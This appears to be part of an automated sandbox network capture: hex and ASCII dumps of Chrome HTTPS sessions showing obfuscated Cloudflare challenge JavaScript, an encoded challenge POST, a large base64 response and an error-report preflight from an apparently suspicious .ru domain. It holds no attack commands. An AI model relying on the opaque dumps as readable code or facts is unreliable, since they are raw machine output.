                                              2024-12-18 22:41:55 UTC1369INData Raw: 29 29 43 3d 4c 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 68 44 28 33 32 30 29 5d 5b 68 44 28 33 34 33 29 5d 5b 68 44 28 38 35 38 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 44 28 31 33 30 35 29 5d 28 30 29 29 7b 69 66 28 64 5b 68 44 28 37 37 33 29 5d 28 64 5b 68 44 28 31 33 35 35 29 5d 2c 68 44 28 39 35 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 68 44 28 33 35 33 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 68 44 28 39 30 31 29 5d 28 49 2c 64 5b 68 44 28 31 30 37 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 44 28 31 36 31 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 44 28 31 33 30 35 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 68 44 28 31 35 30 35 29 5d 28 64
                                              Data Ascii: ))C=L;else{if(Object[hD(320)][hD(343)][hD(858)](B,C)){if(256>C[hD(1305)](0)){if(d[hD(773)](d[hD(1355)],hD(950))){for(s=0;d[hD(353)](s,F);H<<=1,d[hD(901)](I,d[hD(1075)](j,1))?(I=0,G[hD(1615)](o(H)),H=0):I++,s++);for(M=C[hD(1305)](0),s=0;8>s;H=d[hD(1505)](d
                                              2024-12-18 22:41:55 UTC1369INData Raw: 31 35 29 5d 28 64 5b 68 44 28 34 36 34 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 68 44 28 31 34 30 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 44 28 31 31 35 39 29 5d 28 48 2c 31 29 7c 64 5b 68 44 28 37 33 34 29 5d 28 4d 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 44 28 31 36 31 35 29 5d 28 64 5b 68 44 28 31 30 37 30 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 64 5b 68 44 28 39 30 31 29 5d 28 30 2c 44 29 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b
                                              Data Ascii: 15)](d[hD(464)](o,H)),H=0):I++,M>>=1,s++);}D--,D==0&&(D=Math[hD(1403)](2,F),F++),delete B[C]}else for(M=x[C],s=0;s<F;H=d[hD(1159)](H,1)|d[hD(734)](M,1),j-1==I?(I=0,G[hD(1615)](d[hD(1070)](o,H)),H=0):I++,M>>=1,s++);D--,d[hD(901)](0,D)&&F++}for(M=2,s=0;s<F;
                                              2024-12-18 22:41:55 UTC1369INData Raw: 2b 29 29 2c 4b 7c 3d 47 2a 28 30 3c 4d 3f 31 3a 30 29 2c 47 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4e 3d 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 48 28 31 34 30 33 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 4c 21 3d 47 3b 4d 3d 64 5b 68 48 28 31 34 30 32 29 5d 28 48 2c 49 29 2c 49 3e 3e 3d 31 2c 64 5b 68 48 28 31 36 35 36 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 64 5b 68 48 28 36 31 31 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 68 48 28 31 32 37 33 29 5d 28 30 3c 4d 3f 31 3a 30 2c 47 29 2c 47 3c 3c 3d 31 29 3b 78 5b 43 2b 2b 5d 3d 65 28 4b 29 2c 4e 3d 43 2d 31 2c 42 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 48 28 31 34 30 33 29 5d 28 32 2c 31 36 29 2c 47 3d 31
                                              Data Ascii: +)),K|=G*(0<M?1:0),G<<=1);switch(N=K){case 0:for(K=0,L=Math[hH(1403)](2,8),G=1;L!=G;M=d[hH(1402)](H,I),I>>=1,d[hH(1656)](0,I)&&(I=j,H=d[hH(611)](o,J++)),K|=d[hH(1273)](0<M?1:0,G),G<<=1);x[C++]=e(K),N=C-1,B--;break;case 1:for(K=0,L=Math[hH(1403)](2,16),G=1
                                              2024-12-18 22:41:55 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 65 3d 64 2c 66 3d 31 2c 67 3d 65 5b 68 4b 28 39 37 35 29 5d 28 31 65 33 2c 65 4d 5b 68 4b 28 38 35 32 29 5d 5b 68 4b 28 31 37 30 32 29 5d 28 65 5b 68 4b 28 38 31 35 29 5d 28 32 2c 66 29 2c 33 32 29 29 2c 65 4d 5b 68 4b 28 31 33 33 39 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 4c 29 7b 68 4c 3d 68 4b 2c 65 4d 5b 68 4c 28 31 34 31 38 29 5d 26 26 28 65 4d 5b 68 4c 28 39 35 31 29 5d 5b 68 4c 28 31 33 34 35 29 5d 28 29 2c 65 4d 5b 68 4c 28 39 35 31 29 5d 5b 68 4c 28 31 36 32 35 29 5d 28 29 2c 65 4d 5b 68 4c 28 31 30 36 34 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 4c 28 31 34 31 38 29 5d 5b 68 4c 28 31 34 34 35 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 4c 28 36 35 35 29 5d 2c 27 77 69
                                              Data Ascii: function(h,i){return h<<i},e=d,f=1,g=e[hK(975)](1e3,eM[hK(852)][hK(1702)](e[hK(815)](2,f),32)),eM[hK(1339)](function(hL){hL=hK,eM[hL(1418)]&&(eM[hL(951)][hL(1345)](),eM[hL(951)][hL(1625)](),eM[hL(1064)]=!![],eM[hL(1418)][hL(1445)]({'source':e[hL(655)],'wi
                                              2024-12-18 22:41:55 UTC1369INData Raw: 31 35 31 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 73 5b 68 4d 28 39 32 31 29 5d 28 68 4d 28 39 38 30 29 2c 68 4d 28 35 32 35 29 29 2c 42 3d 7b 7d 2c 42 5b 68 4d 28 31 30 39 35 29 5d 3d 66 2c 42 5b 68 4d 28 35 33 37 29 5d 3d 6a 2c 42 2e 63 63 3d 67 2c 42 5b 68 4d 28 37 38 37 29 5d 3d 6b 2c 42 5b 68 4d 28 31 32 39 34 29 5d 3d 6f 2c 43 3d 4a 53 4f 4e 5b 68 4d 28 31 34 30 35 29 5d 28 42 29 2c 44 3d 66 72 5b 68 4d 28 31 31 31 35 29 5d 28 43 29 5b 68 4d 28 31 36 33 38 29 5d 28 27 2b 27 2c 69 5b 68 4d 28 31 33 34 39 29 5d 29 2c 73 5b 68 4d 28 34 34 32 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 4d 28 35 34 35 29 5d 5b 68 4d 28 37 38 38 29 5d 2b 27 3d 27 2b 44 29 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 31 30 39 30 29 5d 3d 66 75 6e 63 74 69 6f
                                              Data Ascii: 1513)]=function(){},s[hM(921)](hM(980),hM(525)),B={},B[hM(1095)]=f,B[hM(537)]=j,B.cc=g,B[hM(787)]=k,B[hM(1294)]=o,C=JSON[hM(1405)](B),D=fr[hM(1115)](C)[hM(1638)]('+',i[hM(1349)]),s[hM(442)]('v_'+eM[hM(545)][hM(788)]+'='+D)}catch(E){}},eM[gJ(1090)]=functio


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449769104.18.94.414434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:53 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/160626399:1734560133:CxEHW6ls1QStHHo8izYqeiN0Qay4NLd4i9ydaBICDmw/8f42a9a00a2d7286/oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb HTTP/1.1
                                              Host: challenges.cloudflare.com
                                              Connection: keep-alive
                                              Content-Length: 3187
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Content-type: application/x-www-form-urlencoded
                                              CF-Chl-RetryAttempt: 0
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              CF-Challenge: oxIi2MC_VEUqoPcgwB3ukZ8_.qWkam_6ZTzrKkJZlCA-1734561710-1.1.1.1-EOZzLSRjZf2Kq5JXVquY3v6RplynX0ClLJoiKSLVriYifYwao04EufKZgFDH2dJb
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Origin: https://challenges.cloudflare.com
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2o5gc/0x4AAAAAAA0M5hIzzgaFooSR/auto/fbE/normal/auto/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:53 UTC3187OUTData Raw: 76 5f 38 66 34 32 61 39 61 30 30 61 32 64 37 32 38 36 3d 6d 53 34 63 64 63 71 63 45 63 77 63 65 63 74 43 73 5a 43 73 6b 59 6c 6b 6c 56 38 72 6c 38 73 6c 59 7a 56 2d 6c 45 7a 73 54 43 73 7a 2d 39 73 42 44 63 2d 57 6f 6b 44 57 64 52 53 6c 49 73 36 59 71 2d 73 48 71 63 73 69 4c 73 38 25 32 62 61 73 72 35 59 73 56 34 52 63 54 44 73 61 63 71 64 35 73 65 43 57 71 73 42 73 38 39 7a 59 59 24 4e 69 38 79 69 63 54 31 4e 52 73 65 4a 44 57 37 79 4c 56 62 4e 49 62 4c 73 54 34 6c 46 73 6c 34 6f 31 78 52 35 34 4c 73 38 6d 63 63 73 53 41 44 59 57 74 74 33 6d 42 73 78 6f 36 7a 71 43 52 73 71 69 71 42 4c 57 73 38 57 73 66 38 6c 53 4c 47 33 2d 73 6b 57 59 73 78 42 63 73 32 4c 24 72 36 54 24 4b 2b 57 6c 31 42 68 44 73 6f 31 59 73 6f 78 39 73 34 46 44 73 44 31 73 59 4b 63 6c
                                              Data Ascii: v_8f42a9a00a2d7286=mS4cdcqcEcwcectCsZCskYlklV8rl8slYzV-lEzsTCsz-9sBDc-WokDWdRSlIs6Yq-sHqcsiLs8%2basr5YsV4RcTDsacqd5seCWqsBs89zYY$Ni8yicT1NRseJDW7yLVbNIbLsT4lFsl4o1xR54Ls8mccsSADYWtt3mBsxo6zqCRsqiqBLWs8Wsf8lSLG3-skWYsxBcs2L$r6T$K+Wl1BhDso1Ysox9s4FDsD1sYKcl
                                              2024-12-18 22:41:55 UTC747INHTTP/1.1 200 OK
                                              Date: Wed, 18 Dec 2024 22:41:55 GMT
                                              Content-Type: text/plain; charset=UTF-8
                                              Content-Length: 149628
                                              Connection: close
                                              cf-chl-gen: dhFxlqEVEBujAogvVUanTRtrDVnE+gBfc+hM5QFR2tNVZZOfwJ3MWbcS/d+TYAknqIFMipuXRNhnexlsmv8kMHRKNS2c50kU9C1b5l6LKaD4JtNdLV1ZZbbsiH645Hit9DGDIRNRR6Jy8PsYzLoJ6MsEONqRQJXoI75Cx/SGsQj1VlbOqWhCEgZurkjXx4t22T8stguBu/aeN9x118QJ3wnOLOq/deKxQLrd3uoW5pr/eDmEohxMVR/UFaY2X5bGy3EcTdYZ253u2X2BHqjxeSFjrGHRCd4LGbNrylGbWbnUMwvzWxoK65dmhxFsKwnBtlfI1rnA41TUB0HANaSrMdkuujptBwI9TB7W4iRXyL3IW/O4MfXUki9JFMqbE1dC6i8CytLc9J7da0HUdIPTXjGDUtezvnpgdCLzFA7ELRyre8KaJ0KZuatlBefYFaH26Fzs5yXYqxzOy3KeNd9JPpy/9QhSD7GBni7jMv223VrKnF4=$rvP6zUNjp6TYGmuR
                                              Server: cloudflare
                                              CF-RAY: 8f42a9c1cc068c1d-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-12-18 22:41:55 UTC622INData Raw: 57 33 35 75 58 30 35 70 69 33 4a 68 67 6d 6d 53 56 6f 52 52 61 57 75 4e 69 31 70 7a 6f 5a 65 53 62 5a 70 76 62 36 4e 6c 67 32 71 6c 66 33 69 4b 6f 6e 2b 53 67 49 79 67 63 36 35 7a 74 61 4f 53 6d 5a 65 4f 66 61 75 71 6b 4a 72 41 6c 72 48 48 74 4c 75 4a 74 59 50 45 77 63 62 47 75 49 6e 51 78 38 57 78 31 59 33 55 73 4d 6d 62 31 35 4f 58 6d 5a 4c 69 30 36 4b 77 78 5a 32 38 77 4f 65 30 71 2b 6e 66 75 4b 2f 73 70 2f 4f 37 38 63 6a 72 74 4b 2f 4c 35 2f 50 64 7a 39 2f 73 39 64 66 71 2f 73 50 44 35 41 6e 6d 2b 65 41 41 42 41 48 41 42 41 67 4f 37 76 7a 71 43 65 37 79 47 4f 7a 4d 39 78 6a 70 39 39 58 78 46 4e 6f 4e 44 39 77 63 38 52 63 43 4a 77 50 6a 44 2f 30 4a 2f 50 34 42 42 79 63 74 43 42 54 75 4a 2f 6b 35 45 67 37 31 48 54 66 2b 41 6b 4d 4f 47 6a 59 56 52 6b 67
                                              Data Ascii: W35uX05pi3JhgmmSVoRRaWuNi1pzoZeSbZpvb6Nlg2qlf3iKon+SgIygc65ztaOSmZeOfauqkJrAlrHHtLuJtYPEwcbGuInQx8Wx1Y3UsMmb15OXmZLi06KwxZ28wOe0q+nfuK/sp/O78cjrtK/L5/Pdz9/s9dfq/sPD5Anm+eAABAHABAgO7vzqCe7yGOzM9xjp99XxFNoND9wc8RcCJwPjD/0J/P4BByctCBTuJ/k5Eg71HTf+AkMOGjYVRkg
                                              2024-12-18 22:41:55 UTC1369INData Raw: 39 4a 58 6a 74 51 4e 6c 77 39 51 79 51 37 57 56 78 6a 4b 55 52 73 4c 54 74 64 4c 57 6f 78 64 48 51 7a 56 46 73 33 4e 30 5a 30 63 47 78 62 58 6e 78 58 51 6c 56 45 5a 59 4a 35 68 55 57 42 67 6d 70 4f 6b 6b 6c 54 59 58 4f 56 62 34 43 46 55 47 35 5a 64 5a 6c 62 6e 34 75 51 6d 58 2b 51 66 48 39 68 70 6d 43 6c 70 4a 78 32 6b 4a 79 63 62 71 35 72 62 57 69 52 74 4a 65 61 75 48 57 2b 69 72 56 38 6b 4c 75 5a 70 62 47 38 70 4b 61 54 6e 4c 6e 4d 6f 59 75 35 6f 35 47 52 70 72 2b 50 79 63 66 52 71 4e 54 48 6e 4d 69 39 6d 4c 76 52 32 4b 75 61 33 72 2f 46 76 4d 47 6e 70 4f 71 38 75 64 37 66 35 62 44 63 35 4d 76 6c 36 4d 50 6a 35 66 48 51 7a 39 57 35 31 63 34 44 75 2f 44 57 39 4e 62 66 35 50 63 41 41 39 62 59 37 4d 77 49 7a 66 44 38 39 52 4c 6a 41 73 76 32 44 78 41 4c 41
                                              Data Ascii: 9JXjtQNlw9QyQ7WVxjKURsLTtdLWoxdHQzVFs3N0Z0cGxbXnxXQlVEZYJ5hUWBgmpOkklTYXOVb4CFUG5ZdZlbn4uQmX+QfH9hpmClpJx2kJycbq5rbWiRtJeauHW+irV8kLuZpbG8pKaTnLnMoYu5o5GRpr+PycfRqNTHnMi9mLvR2Kua3r/FvMGnpOq8ud7f5bDc5Mvl6MPj5fHQz9W51c4Du/DW9Nbf5PcAA9bY7MwIzfD89RLjAsv2DxALA
                                              2024-12-18 22:41:55 UTC1369INData Raw: 4f 4e 6d 52 63 52 69 63 33 4a 45 52 71 4f 6b 39 75 4c 47 56 42 55 56 52 79 55 31 42 4a 64 31 4a 39 54 54 4a 61 66 32 47 42 62 6d 39 42 64 34 4e 72 51 6b 73 2f 57 6d 35 34 59 47 4f 4f 55 46 52 52 6a 6d 5a 6c 63 34 6d 61 57 70 6c 63 58 59 42 62 6f 6c 75 67 65 48 68 61 70 70 56 31 66 4b 79 70 6c 37 43 62 61 34 32 49 74 59 75 74 63 57 75 6d 71 71 71 7a 6d 4b 2b 4e 74 58 6d 78 77 38 4f 36 74 71 4b 2b 77 4c 7a 4e 7a 4b 43 39 72 4b 43 61 70 49 37 54 6c 63 53 6f 32 4b 4f 30 72 4e 62 63 30 4b 37 65 6e 4e 4f 78 7a 37 54 69 36 65 72 54 31 38 61 2f 71 2b 7a 4e 73 64 37 51 78 4d 37 68 39 4e 69 7a 7a 76 50 6d 76 50 76 35 73 74 72 30 2f 74 6e 4e 43 4d 54 53 79 63 66 2b 36 75 59 4d 2b 65 37 62 45 67 72 64 79 2b 34 56 43 4f 49 59 31 75 2f 6d 39 79 48 65 34 52 2f 37 4a 4f
                                              Data Ascii: ONmRcRic3JERqOk9uLGVBUVRyU1BJd1J9TTJaf2GBbm9Bd4NrQks/Wm54YGOOUFRRjmZlc4maWplcXYBbolugeHhappV1fKypl7Cba42ItYutcWumqqqzmK+NtXmxw8O6tqK+wLzNzKC9rKCapI7TlcSo2KO0rNbc0K7enNOxz7Ti6erT18a/q+zNsd7QxM7h9NizzvPmvPv5str0/tnNCMTSycf+6uYM+e7bEgrdy+4VCOIY1u/m9yHe4R/7JO
                                              2024-12-18 22:41:55 UTC1369INData Raw: 49 79 74 44 4c 6b 49 77 51 32 78 44 4d 57 56 6f 62 32 56 32 56 56 4a 31 55 6b 32 41 57 49 47 41 57 33 56 6f 55 32 4e 65 56 56 52 2b 66 49 5a 68 63 47 4a 75 58 6f 4b 4d 6b 47 31 71 65 6c 68 37 65 6e 68 66 6b 33 70 78 67 6c 32 64 65 47 4a 2b 6d 6e 61 45 6d 70 64 73 5a 59 4f 78 62 32 57 76 73 71 47 7a 64 6e 47 5a 76 49 61 61 71 58 79 49 74 70 4f 56 75 37 69 30 78 5a 57 31 79 72 75 43 6e 62 32 69 6d 4d 65 4f 6b 64 4f 6b 74 4c 43 67 7a 5a 53 6e 31 62 57 72 6c 5a 7a 61 30 64 66 53 74 62 57 35 32 2b 58 4b 78 4e 2f 57 34 71 6a 47 32 39 4c 4a 36 75 2f 6d 30 65 6a 6d 75 72 66 38 36 73 69 36 7a 39 61 37 31 4c 33 75 78 66 4c 6b 42 77 58 69 78 51 6b 45 79 65 50 50 37 77 50 77 78 2b 67 4d 47 67 30 4e 45 68 33 72 38 68 33 78 44 68 59 44 49 4f 48 31 47 4e 38 5a 39 68 34
                                              Data Ascii: IytDLkIwQ2xDMWVob2V2VVJ1Uk2AWIGAW3VoU2NeVVR+fIZhcGJuXoKMkG1qelh7enhfk3pxgl2deGJ+mnaEmpdsZYOxb2WvsqGzdnGZvIaaqXyItpOVu7i0xZW1yruCnb2imMeOkdOktLCgzZSn1bWrlZza0dfStbW52+XKxN/W4qjG29LJ6u/m0ejmurf86si6z9a71L3uxfLkBwXixQkEyePP7wPwx+gMGg0NEh3r8h3xDhYDIOH1GN8Z9h4
                                              2024-12-18 22:41:55 UTC1369INData Raw: 30 4a 69 4d 56 56 47 62 54 56 6a 5a 54 51 31 4e 33 38 2f 58 6b 74 66 67 34 5a 6b 51 56 56 30 50 56 39 6d 5a 49 31 68 61 58 39 72 69 45 74 70 61 57 4e 57 69 70 57 4c 61 35 78 64 6e 47 71 4f 6b 4a 70 35 67 34 68 6c 69 70 52 68 65 71 35 72 67 6f 31 70 70 36 75 6e 6b 35 65 4e 71 4c 61 36 6b 35 5a 35 66 62 69 4d 72 4a 47 44 68 4c 61 35 67 4c 43 36 76 34 53 63 76 34 6e 44 6e 38 47 6c 76 35 44 51 70 70 65 4f 79 72 75 31 73 39 44 55 79 74 7a 4b 77 62 7a 50 7a 71 48 53 32 74 4c 4a 32 75 6a 57 7a 4d 6a 72 30 73 4c 65 73 4f 48 46 77 4c 4c 4e 37 39 76 7a 74 66 33 49 38 4c 4f 35 2b 4d 34 48 7a 2f 44 59 30 76 54 6b 41 4e 77 46 42 4e 77 4e 7a 2b 62 6d 37 38 33 6d 31 74 63 4a 32 52 44 6d 48 51 2f 35 39 2b 37 67 48 78 77 66 4a 41 49 59 2b 51 6f 48 47 51 34 73 36 2b 67 44
                                              Data Ascii: 0JiMVVGbTVjZTQ1N38/Xktfg4ZkQVV0PV9mZI1haX9riEtpaWNWipWLa5xdnGqOkJp5g4hlipRheq5rgo1pp6unk5eNqLa6k5Z5fbiMrJGDhLa5gLC6v4Scv4nDn8Glv5DQppeOyru1s9DUytzKwbzPzqHS2tLJ2ujWzMjr0sLesOHFwLLN79vztf3I8LO5+M4Hz/DY0vTkANwFBNwNz+bm783m1tcJ2RDmHQ/59+7gHxwfJAIY+QoHGQ4s6+gD
                                              2024-12-18 22:41:55 UTC1369INData Raw: 70 63 4d 6e 41 33 66 6a 4a 30 59 34 4f 42 64 44 35 66 52 57 70 66 68 48 78 74 56 32 5a 34 58 59 4e 79 5a 59 70 54 66 34 47 45 65 47 53 52 68 6d 78 73 58 4a 43 41 63 4a 61 46 68 5a 43 42 59 49 4b 55 6c 36 69 65 6e 34 68 39 70 57 75 6d 69 49 31 33 75 58 4f 6d 71 71 57 50 69 4c 47 35 6b 4a 79 63 6f 70 61 68 76 62 53 71 76 4a 57 6e 67 36 47 6c 76 4b 33 44 6a 59 36 67 6e 73 32 78 6f 72 47 76 72 72 50 56 32 73 47 31 77 4e 69 32 70 4d 54 64 6f 72 6d 35 36 38 48 49 74 73 47 74 78 76 44 6e 79 39 4c 75 39 4c 50 70 74 66 7a 31 31 4c 62 4b 37 63 33 4c 7a 39 54 53 33 39 50 51 78 77 6e 58 31 4e 62 58 33 67 48 66 45 78 44 79 38 2b 48 6f 44 77 50 32 42 66 48 6d 36 4f 6a 65 46 4f 34 67 45 76 4c 69 47 77 49 47 49 51 30 64 41 79 6a 37 43 53 51 51 4c 53 4d 79 49 6a 59 4b 4d
                                              Data Ascii: pcMnA3fjJ0Y4OBdD5fRWpfhHxtV2Z4XYNyZYpTf4GEeGSRhmxsXJCAcJaFhZCBYIKUl6ien4h9pWumiI13uXOmqqWPiLG5kJycopahvbSqvJWng6GlvK3DjY6gns2xorGvrrPV2sG1wNi2pMTdorm568HItsGtxvDny9Lu9LPptfz11LbK7c3Lz9TS39PQxwnX1NbX3gHfExDy8+HoDwP2BfHm6OjeFO4gEvLiGwIGIQ0dAyj7CSQQLSMyIjYKM
                                              2024-12-18 22:41:55 UTC1369INData Raw: 43 57 33 39 44 56 48 74 65 64 48 39 65 66 57 52 74 67 47 5a 74 58 46 35 68 58 33 5a 78 62 4a 52 31 6c 49 6c 39 61 58 4a 63 58 46 75 51 69 35 74 34 70 5a 46 69 6b 6e 4f 73 65 6f 4b 49 67 36 4b 42 6f 58 4b 69 62 5a 4f 59 69 6d 75 6f 74 59 79 48 6c 4c 53 41 69 5a 6c 36 72 48 65 66 75 49 69 59 6c 49 4f 31 77 63 4f 6a 77 36 4f 68 70 62 4b 74 78 37 57 31 70 74 72 57 30 61 7a 5a 73 70 4c 4c 77 4d 32 39 73 65 4f 69 35 4d 43 68 78 4c 69 38 79 75 4c 45 79 38 36 75 37 39 4c 43 36 74 43 72 34 72 48 34 79 39 4c 4e 7a 4e 37 7a 37 76 6a 37 33 74 58 54 41 38 49 4d 35 73 63 49 33 39 44 76 7a 73 77 4f 44 41 33 50 42 51 4c 54 43 78 4d 51 2f 65 6a 65 43 75 2f 6a 46 66 67 47 42 77 50 34 4a 51 73 74 44 44 41 69 43 7a 48 37 2b 2b 77 58 49 76 63 47 4c 53 33 35 2b 44 58 36 48 6b
                                              Data Ascii: CW39DVHtedH9efWRtgGZtXF5hX3ZxbJR1lIl9aXJcXFuQi5t4pZFiknOseoKIg6KBoXKibZOYimuotYyHlLSAiZl6rHefuIiYlIO1wcOjw6OhpbKtx7W1ptrW0azZspLLwM29seOi5MChxLi8yuLEy86u79LC6tCr4rH4y9LNzN7z7vj73tXTA8IM5scI39DvzswODA3PBQLTCxMQ/ejeCu/jFfgGBwP4JQstDDAiCzH7++wXIvcGLS35+DX6Hk
                                              2024-12-18 22:41:55 UTC1369INData Raw: 50 6c 74 30 64 6e 68 73 5a 45 2b 44 68 49 4e 6a 58 59 4a 33 54 6d 70 54 65 6d 74 70 6c 31 71 51 55 6d 6d 4b 67 5a 4a 7a 6f 47 56 6b 64 49 6c 35 5a 33 57 65 6a 61 32 64 66 34 36 31 6c 47 32 69 71 71 65 6d 75 6e 61 56 71 71 43 2b 6a 33 39 31 6f 34 36 54 6b 49 61 39 74 36 4b 38 68 70 32 6d 78 37 6e 44 6a 71 75 2f 73 71 54 4d 79 4d 57 59 76 61 7a 63 33 62 36 76 31 63 4f 68 30 38 50 5a 35 36 44 48 36 38 48 73 34 62 79 76 36 74 71 75 33 4c 54 65 31 74 57 34 36 66 61 35 74 2b 6e 36 2f 72 33 33 39 74 6e 63 31 4e 6a 38 34 65 51 4a 33 65 48 65 43 50 76 6d 79 74 76 4c 33 2f 48 72 39 4f 6b 61 38 77 37 74 39 2b 7a 76 44 79 4d 6a 37 78 33 75 32 53 41 58 47 68 6f 49 4b 65 6f 71 42 51 51 44 43 53 34 41 39 43 34 42 44 50 67 4b 42 77 38 77 38 53 49 75 48 2f 34 44 2f 55 51
                                              Data Ascii: Plt0dnhsZE+DhINjXYJ3TmpTemtpl1qQUmmKgZJzoGVkdIl5Z3Weja2df461lG2iqqemunaVqqC+j391o46TkIa9t6K8hp2mx7nDjqu/sqTMyMWYvazc3b6v1cOh08PZ56DH68Hs4byv6tqu3LTe1tW46fa5t+n6/r339tnc1Nj84eQJ3eHeCPvmytvL3/Hr9Oka8w7t9+zvDyMj7x3u2SAXGhoIKeoqBQQDCS4A9C4BDPgKBw8w8SIuH/4D/UQ
                                              2024-12-18 22:41:55 UTC1369INData Raw: 45 32 47 66 30 70 4a 63 6e 56 6c 5a 4a 4f 44 65 46 4f 62 68 70 57 64 67 4a 74 69 63 32 4b 6c 6f 33 43 52 67 6f 69 4a 6f 36 79 47 71 49 71 75 66 36 6c 39 74 59 5a 32 6a 47 75 56 68 71 56 37 76 61 69 4d 6a 5a 58 41 6e 70 6d 44 6c 36 69 64 68 37 33 45 75 73 69 6a 7a 35 6d 36 76 4a 79 6b 79 63 72 46 32 71 65 74 6c 4b 6e 4c 71 63 79 78 32 4d 44 51 6d 39 48 6f 31 4d 50 56 77 4f 62 46 74 36 2f 78 75 36 2b 2b 78 4d 66 49 38 63 33 50 38 74 54 35 32 37 54 4d 39 73 72 55 38 4d 37 55 77 4f 6a 55 78 63 50 44 43 65 73 4d 78 77 51 46 37 65 54 30 45 67 37 4f 41 75 33 73 2b 39 67 50 39 74 34 52 38 68 6e 77 47 65 38 55 38 76 6f 4a 47 42 59 46 37 66 6f 6c 4d 75 77 51 41 52 48 77 36 43 30 77 41 7a 7a 37 4e 79 77 56 47 78 6a 2b 48 67 49 6c 2f 41 54 35 46 30 51 63 48 6a 35 45
                                              Data Ascii: E2Gf0pJcnVlZJODeFObhpWdgJtic2Klo3CRgoiJo6yGqIquf6l9tYZ2jGuVhqV7vaiMjZXAnpmDl6idh73Eusijz5m6vJykycrF2qetlKnLqcyx2MDQm9Ho1MPVwObFt6/xu6++xMfI8c3P8tT527TM9srU8M7UwOjUxcPDCesMxwQF7eT0Eg7OAu3s+9gP9t4R8hnwGe8U8voJGBYF7folMuwQARHw6C0wAzz7NywVGxj+HgIl/AT5F0QcHj5E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.44977035.190.80.14434948C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-18 22:41:54 UTC536OUTOPTIONS /report/v4?s=saFgmiTc5V41N8BgPBOMaBvy7irAvCw%2Btf3FREkyT8h9lOkR3%2FyLaeY6s%2B9SSfoqZyWMbiEXBp2PkYnjSiYdr16KA6dwwvSm07Ed8EgdJZnHJ%2FCXmi1HeYiivW2H5A%3D%3D HTTP/1.1
                                              Host: a.nel.cloudflare.com
                                              Connection: keep-alive
                                              Origin: https://to.eemjhiulz.ru
                                              Access-Control-Request-Method: POST
                                              Access-Control-Request-Headers: content-type
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-12-18 22:41:55 UTC336INHTTP/1.1 200 OK
                                              Content-Length: 0
                                              access-control-max-age: 86400
                                              access-control-allow-methods: POST, OPTIONS
                                              access-control-allow-origin: *
                                              access-control-allow-headers: content-type, content-length
                                              date: Wed, 18 Dec 2024 22:41:55 GMT
